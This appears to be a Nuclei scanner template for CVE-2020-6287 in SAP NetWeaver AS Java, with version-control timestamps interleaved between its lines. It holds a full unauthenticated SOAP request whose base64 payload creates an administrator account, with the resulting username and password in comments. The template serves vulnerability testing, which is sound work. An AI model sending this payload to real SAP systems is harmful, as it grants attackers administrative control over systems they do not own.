2021-01-02 04:56:15 +00:00
id : CVE-2020-6287
2020-07-21 06:53:00 +00:00
info :
2022-04-29 19:58:07 +00:00
name : SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition
2020-07-21 06:53:00 +00:00
author : dwisiswant0
severity : critical
2022-05-17 09:18:12 +00:00
description : SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.
2021-03-16 15:10:36 +00:00
reference :
- https://launchpad.support.sap.com/#/notes/2934135
- https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675
- https://www.onapsis.com/recon-sap-cyber-security-vulnerability
2021-06-05 04:59:59 +00:00
- https://github.com/chipik/SAP_RECON
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-6287
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-6287
cwe-id : CWE-306
2022-06-01 21:31:44 +00:00
tags : cve,cve2020,sap,cisa
2020-07-21 06:53:00 +00:00
requests :
2021-06-05 06:45:32 +00:00
- raw :
2020-07-21 06:53:00 +00:00
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host : {{Hostname}}
Content-Type : text/xml; charset=UTF-8
2020-07-21 08:00:14 +00:00
Connection : close
2020-07-21 06:53:00 +00:00
2021-06-05 06:45:32 +00:00
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>
CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==
</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
# userName - sapRpoc6351
# password - Secure!PwD8890
2021-06-05 04:59:59 +00:00
2020-07-21 06:53:00 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-06-05 04:59:59 +00:00
- "CTCWebServiceSi"
- "SOAP-ENV"
2020-07-21 06:53:00 +00:00
part : body
2021-06-05 04:59:59 +00:00
condition : and
2020-07-21 06:53:00 +00:00
- type : status
status :
2021-05-05 11:56:14 +00:00
- 200
- type : word
words :
- "text/xml"
2021-06-05 04:59:59 +00:00
- "SAP NetWeaver Application Server"
2021-06-05 06:45:32 +00:00
part : header
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/29